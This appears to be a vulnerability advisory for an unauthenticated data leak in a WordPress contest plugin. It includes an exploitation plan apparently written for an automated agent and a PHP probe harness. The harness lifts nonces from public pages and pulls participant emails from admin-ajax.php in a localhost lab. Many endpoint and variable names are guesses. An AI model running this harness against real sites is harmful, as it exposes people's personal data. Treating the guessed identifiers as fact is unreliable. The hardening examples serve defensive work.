CVE-2026-25023

Run Contests, Raffles, and Giveaways with ContestsWP <= 2.0.7 - Unauthenticated Information Exposure

Weakness: Exposure of Sensitive Information to an Unauthorized Actor
CVSS Score: 5.3
Severity: Medium
Patched in: 2.1.1
Time to patch: 9d

Description

The Run Contests, Raffles, and Giveaways with ContestsWP plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.7. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: Low
Integrity: None
Availability: None

Technical Details

Affected versions: <= 2.0.7
Published: February 2, 2026
Last updated: February 10, 2026
Affected plugin: contest-code-checker

Source Code

WordPress.org SVN
Patched: patched version not available.

Research Plan
Unverified

Based on the vulnerability description for CVE-2026-25023, the plugin "Run Contests, Raffles, and Giveaways with ContestsWP" (slug: contest-code-checker) contains an unauthenticated information exposure vulnerability. This typically occurs when an AJAX handler or REST API endpoint intended for administrative use or restricted frontend use is registered for unauthenticated users (wp_ajax_nopriv_) and fails to implement proper capability or identity checks.

The following exploitation research plan is designed for an automated agent to identify and confirm the leak of sensitive participant or configuration data.


1. Vulnerability Summary

  • Vulnerability: Unauthenticated Information Exposure.
  • Plugin: Run Contests, Raffles, and Giveaways with ContestsWP (ContestsWP).
  • Vulnerable Versions: <= 2.0.7.
  • Root Cause: Improper access control on an AJAX action (likely registered via wp_ajax_nopriv_) that retrieves database records containing participant details (emails, names, entry codes) or plugin settings without validating the requester's authority.

2. Attack Vector Analysis

  • Endpoint: http://localhost:8080/wp-admin/admin-ajax.php.
  • Action (Inferred): Likely registered as wp_ajax_nopriv_cwp_get_entries, wp_ajax_nopriv_get_contest_data, or wp_ajax_nopriv_check_code_status. (Agent must verify the exact string in the source).
  • Authentication: None required (Unauthenticated).
  • Preconditions: At least one contest must exist with participant entries to demonstrate "Information Exposure."

3. Code Flow (Inferred Trace)

  1. Entry Point: The plugin registers a hook: add_action('wp_ajax_nopriv_[ACTION_NAME]', 'handler_function').
  2. Handler Execution: The handler_function is called when a POST request hits admin-ajax.php with the corresponding action.
  3. Data Fetching: The handler likely uses $wpdb to select records from a custom table (e.g., {$wpdb->prefix}contests_entries) or get_posts with a custom post type.
  4. Vulnerable Sink: The code returns the rows with echo json_encode($data) or wp_send_json($data) without first checking a capability such as current_user_can('manage_options'). A nonce check alone would not close the hole: WordPress nonces are CSRF tokens, not an authorization mechanism, and a nonce printed on a public page (see section 4) is available to every unauthenticated visitor.
  5. Output: Sensitive data (emails, PII) is returned in the HTTP response body.
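
The pattern this trace describes, as an added illustration written for this page rather than code taken from ContestsWP: a hypothetical example_get_entries AJAX handler exposed through wp_ajax_nopriv_ that dumps a participant table, followed by the hardened form, a narrow public "check my code" endpoint that is safe to leave unauthenticated, and the equivalent permission_callback rule for a REST route. The hook names, function names, table name and nonce actions are all assumptions; the plugin's real identifiers must come from the source audit in section 6.

```php
<?php
// Added illustration for this page, not code from ContestsWP. The hook,
// function, table and nonce names below are hypothetical placeholders.

// ---- Vulnerable pattern (what the inferred trace describes) ----
// wp_ajax_nopriv_* fires for logged-out visitors, so anyone who can reach
// /wp-admin/admin-ajax.php can invoke this handler.
add_action( 'wp_ajax_nopriv_example_get_entries', 'example_get_entries_vulnerable' );
add_action( 'wp_ajax_example_get_entries', 'example_get_entries_vulnerable' );

function example_get_entries_vulnerable() {
    global $wpdb;
    $contest_id = isset( $_POST['contest_id'] ) ? absint( $_POST['contest_id'] ) : 0;

    // No capability check: the caller is trusted simply for showing up.
    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT id, name, email, entry_code FROM {$wpdb->prefix}example_entries WHERE contest_id = %d",
            $contest_id
        ),
        ARRAY_A
    );

    // Sink: participant PII goes straight into the response body.
    wp_send_json( $rows );
}

// ---- Hardened pattern ----
// No nopriv registration for data only staff should see; authorization
// (capability) first, CSRF (nonce) second; return only needed fields.
add_action( 'wp_ajax_example_get_entries', 'example_get_entries_hardened' );

function example_get_entries_hardened() {
    // A nonce is a CSRF token, not an access control: a value printed on a
    // public page is available to every visitor. The capability check is
    // what actually keeps unauthenticated callers out.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    check_ajax_referer( 'example_entries_nonce', 'nonce' ); // dies on failure

    global $wpdb;
    $contest_id = isset( $_POST['contest_id'] ) ? absint( $_POST['contest_id'] ) : 0;

    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT id, name, entry_code FROM {$wpdb->prefix}example_entries WHERE contest_id = %d",
            $contest_id
        ),
        ARRAY_A
    );
    wp_send_json_success( $rows );
}

// ---- A public endpoint that is safe to expose ----
// If logged-out entrants legitimately need "check my code", expose only that:
// one code in, its status out, never the list and never other entrants' fields.
add_action( 'wp_ajax_nopriv_example_check_code', 'example_check_code' );
add_action( 'wp_ajax_example_check_code', 'example_check_code' );

function example_check_code() {
    check_ajax_referer( 'example_public_nonce', 'nonce' );

    global $wpdb;
    $code = isset( $_POST['code'] ) ? sanitize_text_field( wp_unslash( $_POST['code'] ) ) : '';
    if ( '' === $code ) {
        wp_send_json_error( array( 'message' => 'missing code' ), 400 );
    }

    $status = $wpdb->get_var(
        $wpdb->prepare(
            "SELECT status FROM {$wpdb->prefix}example_entries WHERE entry_code = %s",
            $code
        )
    );
    wp_send_json_success( array( 'found' => null !== $status, 'status' => $status ) );
}

// ---- Same rule for REST routes ----
// permission_callback => '__return_true' (or omitting it) is the REST
// equivalent of a nopriv hook without a capability check.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/entries', array(
        'methods'             => 'GET',
        'callback'            => function ( WP_REST_Request $req ) {
            global $wpdb;
            return rest_ensure_response( $wpdb->get_results(
                $wpdb->prepare( "SELECT id, name, entry_code FROM {$wpdb->prefix}example_entries WHERE contest_id = %d", absint( $req['contest_id'] ) ),
                ARRAY_A
            ) );
        },
        'permission_callback' => function () { return current_user_can( 'manage_options' ); },
    ) );
} );
```

The order inside the hardened handler matters: the capability check runs before the nonce check so that an unauthenticated caller who has lifted a nonce from a public page is rejected on authorization, not merely on a token the attacker can refresh at will.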

4. Nonce Acquisition Strategy

If the plugin uses check_ajax_referer or wp_verify_nonce, the nonce is likely exposed to unauthenticated users on pages where the contest form or "check status" shortcode is rendered.

Step-by-step extraction:

  1. Identify Shortcodes: Search for add_shortcode in the plugin directory. Common candidates: [contests_wp], [contest_code_checker], or [cw_giveaway].
  2. Create Discovery Page: Use WP-CLI to create a page containing the found shortcode:
    wp post create --post_type=page --post_title="Contest Page" --post_status=publish --post_content='[SHORTCODE_NAME]'
    
  3. Extract Nonce via Browser:
    • Navigate to the new page using browser_navigate.
    • Inspect wp_localize_script output. Use browser_eval to find the nonce.
    • Likely Variable: window.cwp_ajax?.nonce or window.contests_wp_vars?.nonce. (Agent must check the JS files in the assets folder for the localization key).

5. Test Data Setup

To confirm the vulnerability, the environment must contain sensitive data to expose.

  1. Create a Contest: If possible via WP-CLI or by simulating the plugin's submission form.
  2. Insert Dummy Entries: Insert records into the plugin's database table:
    # Example (Table name may vary, agent must check schema in activation hook)
    wp db query "INSERT INTO wp_contests_entries (name, email, entry_code) VALUES ('Target User', 'sensitive@example.com', 'SECRET123')"
    

6. Exploitation Strategy

The agent will perform the following steps:

  1. Source Code Audit:
    • Search for wp_ajax_nopriv_ in the plugin folder.
    • Identify the handler function.
    • Check if the handler takes any parameters (e.g., contest_id, search, page).
  2. Payload Construction:
    • Construct a POST request to admin-ajax.php.
    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Headers: Content-Type: application/x-www-form-urlencoded
    • Body: action=[ACTION_NAME]&nonce=[NONCE_IF_REQUIRED]&contest_id=1
  3. Execution: Use the http_request tool.
  4. Data Extraction: Analyze the JSON response for sensitive keys like email, address, phone, or code.

7. Expected Results

  • Success: An HTTP 200 response containing a JSON array or object with the dummy data created in Step 5.
  • Example Response:
    [
      {"id": "1", "name": "Target User", "email": "sensitive@example.com", "entry_code": "SECRET123"}
    ]
    

8. Verification Steps

After receiving the response via http_request, confirm the data matches the database:

  1. Compare the email address returned in the HTTP response to the one inserted via WP-CLI.
  2. Verify that the same request made without a valid nonce (if required) or with a modified action fails, confirming the specific entry point.
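
The request sequence in sections 4, 6, 7 and 8, as an added PHP CLI harness written for this page (not the advisory's or the plugin's code) for use against the lab install the plan assumes at localhost:8080. Everything it parameterises is an assumption to be replaced with what the source audit finds: the page path of the shortcode page created in section 4, the action name, the name of the wp_localize_script variable holding the nonce, the request parameters, and the seeded address sensitive@example.com from section 5.

```php
<?php
// Added harness for this page, not the advisory's or the plugin's code.
// Every name below (URL, page path, action, JS variable, parameters) is an
// assumption to be replaced with what the source audit in section 6 finds.
//
// usage: php probe.php http://localhost:8080 /contest-page/ example_get_entries 'contest_id=1' example_vars

// POST form fields to $url; return [status code, body]. ignore_errors keeps
// the body on 4xx/5xx so the "0" / 400 control response can be shown.
function http_post( string $url, array $fields ): array {
    $ctx = stream_context_create( array( 'http' => array(
        'method'        => 'POST',
        'header'        => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content'       => http_build_query( $fields ),
        'ignore_errors' => true,
        'timeout'       => 15,
    ) ) );
    $body = file_get_contents( $url, false, $ctx );
    // The http stream wrapper fills $http_response_header in this scope.
    preg_match( '#^HTTP/\S+\s+(\d{3})#', $http_response_header[0] ?? '', $m );
    return array( (int) ( $m[1] ?? 0 ), (string) $body );
}

// Pull "nonce" out of a wp_localize_script() blob such as
//   var example_vars = {"ajax_url":"...","nonce":"abc123def4"};
function extract_nonce( string $html, string $js_var ): ?string {
    $re = '/var\s+' . preg_quote( $js_var, '/' ) . '\s*=\s*(\{.*?\});/s';
    if ( ! preg_match( $re, $html, $m ) ) {
        return null;
    }
    $obj = json_decode( $m[1], true );
    return is_array( $obj ) && isset( $obj['nonce'] ) ? (string) $obj['nonce'] : null;
}

// Collect dotted paths of keys whose names look like participant PII,
// descending into wp_send_json_success()'s {"success":..,"data":..} wrapper.
function pii_keys( $node, string $path = '' ): array {
    $found = array();
    if ( ! is_array( $node ) ) {
        return $found;
    }
    foreach ( $node as $k => $v ) {
        $p = ( '' === $path ) ? (string) $k : $path . '.' . $k;
        if ( is_string( $k ) && preg_match( '/email|phone|address|code|name/i', $k ) ) {
            $found[] = $p;
        }
        $found = array_merge( $found, pii_keys( $v, $p ) );
    }
    return $found;
}

$base   = rtrim( $argv[1] ?? 'http://localhost:8080', '/' );
$page   = $argv[2] ?? '/contest-page/';        // page created in section 4, step 2
$action = $argv[3] ?? 'example_get_entries';   // from the wp_ajax_nopriv_ audit
parse_str( $argv[4] ?? '', $extra );           // e.g. contest_id=1
$js_var = $argv[5] ?? 'example_vars';          // from the wp_localize_script audit
$ajax   = $base . '/wp-admin/admin-ajax.php';

// Section 4: fetch the public page with no cookies and lift the nonce, if any.
$nonce  = extract_nonce( (string) @file_get_contents( $base . $page ), $js_var );
$fields = array_merge( array( 'action' => $action ), $extra );
if ( null !== $nonce ) {
    $fields['nonce'] = $nonce;
}

// Sections 6 and 7: the unauthenticated request and what came back.
list( $status, $body ) = http_post( $ajax, $fields );
$hits = pii_keys( json_decode( $body, true ) );
printf( "action=%s nonce=%s status=%d pii_keys=%s\n",
    $action, $nonce ?? '(none)', $status, $hits ? implode( ',', $hits ) : '(none)' );

// Section 8, step 1: the row seeded in section 5 coming back is the proof.
if ( false !== strpos( $body, 'sensitive@example.com' ) ) {
    echo "seeded address returned to an unauthenticated caller: exposure confirmed\n";
}

// Section 8, step 2: negative control. For an action nobody registered,
// admin-ajax.php answers "0" with HTTP 400, so the data must not appear here.
list( $cstatus, $cbody ) = http_post( $ajax, array( 'action' => $action . '_nope' ) + $fields );
printf( "control action=%s status=%d body=%s\n", $action . '_nope', $cstatus, substr( $cbody, 0, 60 ) );
```

The harness deliberately sends no cookies, so a hit proves the unauthenticated path; repeat the run with the nonce parameter stripped to learn whether the handler checks one at all, which decides how the finding is written up.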

9. Alternative Approaches

  • REST API Discovery: Check if the plugin registers routes using register_rest_route. If permission_callback is set to __return_true or is missing, try:
    • GET /wp-json/contests-wp/v1/entries
  • Direct Option Leak: If the AJAX action allows a setting_name parameter, try to request wp_options keys like admin_email or plugin-specific API keys.
  • Information Exposure via SQLi: If the AJAX action accepts an id or search parameter, check if it's used in a raw $wpdb->get_results call, which could lead to a deeper information leak via SQL injection.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Run Contests, Raffles, and Giveaways with ContestsWP plugin for WordPress (versions up to 2.0.7) is vulnerable to unauthenticated information exposure. This occurs because the plugin registers an AJAX handler for unauthenticated users that retrieves and displays sensitive participant information, such as emails and entry codes, without proper capability checks.

Exploit Outline

  1. Identify the unauthenticated AJAX action registered via wp_ajax_nopriv_ (e.g., cwp_get_entries or check_code_status) by auditing the plugin's hooks.
  2. If a nonce is required, visit a public-facing page where the contest shortcode (e.g., [contests_wp]) is rendered and extract the nonce from the localized JavaScript variables (e.g., window.cwp_ajax.nonce).
  3. Send a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to the identified hook and any necessary parameters such as 'contest_id'.
  4. Observe the JSON response, which will contain sensitive PII such as participant names, email addresses, and entry codes from the database.
